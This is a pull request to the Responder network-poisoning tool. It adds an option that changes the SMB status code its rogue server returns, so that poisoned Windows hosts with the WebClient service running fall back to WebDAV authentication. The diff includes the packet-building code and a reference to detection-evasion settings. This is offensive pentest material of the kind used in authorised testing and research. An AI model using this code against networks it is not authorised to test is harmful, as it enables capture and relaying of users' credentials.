### PR TITLE
Add control on the status code returned by the SMB server

### DIFF
--- a/README.md
+++ b/README.md
@@ -173,6 +173,11 @@ Options:
                         answer's canonical name is the same as the query.
                         Changing this value is mainly useful when attempting
                         to perform Kebreros relaying over HTTP.
+    -E, --ErrorCode     Changes the error code returned by the SMB server to
+                        STATUS_LOGON_FAILURE. By default, the status is
+                        STATUS_ACCESS_DENIED. Changing this value permits to
+                        obtain WebDAV authentications from the poisoned
+                        machines where the WebClient service is running.
 
 
 ## Donation ##

--- a/Responder.py
+++ b/Responder.py
@@ -47,6 +47,7 @@ parser.add_option('--disable-ess',         action="store_true", help="Force ESS 
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
 parser.add_option('-t','--ttl',            action="store",      help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None)
 parser.add_option('-N', '--AnswerName',	   action="store",      help="Specifies the canonical name returned by the LLMNR poisoner in tits Answer section. By default, the answer's canonical name is the same as the query. Changing this value is mainly useful when attempting to perform Kebreros relaying over HTTP.", dest="AnswerName", default=None)
+parser.add_option('-E', '--ErrorCode',     action="store_true",      help="Changes the error code returned by the SMB server to STATUS_LOGON_FAILURE. By default, the status is STATUS_ACCESS_DENIED. Changing this value permits to obtain WebDAV authentications from the poisoned machines where the WebClient service is running.", dest="ErrorCode", default=False)
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:
@@ -301,16 +302,16 @@ def main():
 
 		# Load (M)DNS, NBNS and LLMNR Poisoners
 		if settings.Config.LLMNR_On_Off:
-		    from poisoners.LLMNR import LLMNR
-		    threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
+			from poisoners.LLMNR import LLMNR
+			threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
 
 		if settings.Config.NBTNS_On_Off:
-		    from poisoners.NBTNS import NBTNS
-		    threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
+			from poisoners.NBTNS import NBTNS
+			threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
 
 		if settings.Config.MDNS_On_Off:
-		    from poisoners.MDNS import MDNS
-		    threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
+			from poisoners.MDNS import MDNS
+			threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
 
 		#// Vintage Responder BOWSER module, now disabled by default. 
 		#// Generate to much noise & easily detectable on the network when in analyze mode.
@@ -348,8 +349,8 @@ def main():
 			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3128, HTTP_Proxy,)))
 
 		if settings.Config.ProxyAuth_On_Off:
-		        from servers.Proxy_Auth import Proxy_Auth
-		        threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))
+				from servers.Proxy_Auth import Proxy_Auth
+				threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))
 
 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:

--- a/Responder.py
+++ b/Responder.py
@@ -302,16 +302,16 @@ def main():
 
 		# Load (M)DNS, NBNS and LLMNR Poisoners
 		if settings.Config.LLMNR_On_Off:
-			from poisoners.LLMNR import LLMNR
-			threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
+		    from poisoners.LLMNR import LLMNR
+		    threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
 
 		if settings.Config.NBTNS_On_Off:
-			from poisoners.NBTNS import NBTNS
-			threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
+		    from poisoners.NBTNS import NBTNS
+		    threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
 
 		if settings.Config.MDNS_On_Off:
-			from poisoners.MDNS import MDNS
-			threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
+		    from poisoners.MDNS import MDNS
+		    threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
 
 		#// Vintage Responder BOWSER module, now disabled by default. 
 		#// Generate to much noise & easily detectable on the network when in analyze mode.
@@ -349,8 +349,8 @@ def main():
 			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3128, HTTP_Proxy,)))
 
 		if settings.Config.ProxyAuth_On_Off:
-				from servers.Proxy_Auth import Proxy_Auth
-				threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))
+		        from servers.Proxy_Auth import Proxy_Auth
+		        threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))
 
 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:

--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -239,7 +239,11 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
                                 ## Session Setup 3 answer SMBv2.
 				if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
 					ParseSMBHash(data, self.client_address[0], Challenge)
-					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1'))
+					if settings.Config.ErrorCode:
+						ntstatus="\x6d\x00\x00\xc0"
+					else:
+						ntstatus="\x22\x00\x00\xc0"
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus=ntstatus, SessionID=GrabSessionID(data).decode('latin-1'))
 					t = SMB2Session2Data()
 					packet1 = str(head)+str(t)
 					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
@@ -357,7 +361,11 @@ class SMB1LM(BaseRequestHandler):  # SMB Server class, old version
 					self.request.send(NetworkSendBufferPython2or3(Buffer))
 				else:
 					ParseLMNTHash(data,self.client_address[0], Challenge)
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+					if settings.Config.ErrorCode:
+						ntstatus="\x6d\x00\x00\xc0"
+					else:
+						ntstatus="\x22\x00\x00\xc0"
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode=ntstatus,pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head) + str(SMBSessEmpty())
 					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 					self.request.send(NetworkSendBufferPython2or3(Buffer))

--- a/settings.py
+++ b/settings.py
@@ -173,6 +173,7 @@ class Settings:
 		self.ExternalIP6        = options.ExternalIP6
 		self.Quiet_Mode			= options.Quiet
 		self.AnswerName			= options.AnswerName
+		self.ErrorCode          = options.ErrorCode
 
 		# TTL blacklist. Known to be detected by SOC / XDR
 		TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]


### PR DESCRIPTION
Hello!

In [this recent article](https://www.synacktiv.com/publications/taking-the-relaying-capabilities-of-multicast-poisoning-to-the-next-level-tricking), Synacktiv demonstrated that during multicast poisoning, depending on the error code returned by the SMB server at the end of the authentication process, it was possible to force the target machine to authenticate via WebDAV, if the WebClient service was running.

This PR adds a new option, `-E, --ErrorCode`, that permits to switch from the default `STATUS_ACCESS_DENIED`, to `STATUS_LOGON_FAILURE`.